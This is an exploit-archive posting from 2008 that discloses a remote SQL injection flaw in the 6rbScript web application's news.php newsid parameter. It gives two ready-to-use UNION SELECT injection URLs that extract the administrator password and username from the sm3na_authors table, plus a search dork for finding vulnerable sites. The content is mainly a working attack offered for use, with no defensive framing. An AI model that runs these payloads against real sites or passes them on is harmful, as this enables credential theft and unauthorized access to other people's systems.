[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 6rbScript (news.php newsid) Remote SQL Injection Vulnerability
# Published : 2008-05-21
# Author : Hussin X
# Previous Title : Alcatel OmniPCX Office 210/061.1 Remote Command Execution Vuln
# Next Title : Webl?sninger <= v4 (XSS/SQL) Multiple Remote Vulnerabilities
##########################################################
#
# 6rbScript SQL Injection Vulnerability
#
# by Hussin X
#
# Home: www.tryag.cc/cc
#
# darkangel_g85[at]Yahoo[DoT]com
#
# DoRK: Powered by 6rbScript
##########################################################
##########################################################
Exploit:
PWD
http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
USER
http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
###########################################################
Greetz: All IRAQI And all HACKER
###########################################################
# www.Syue.com [2008-05-21]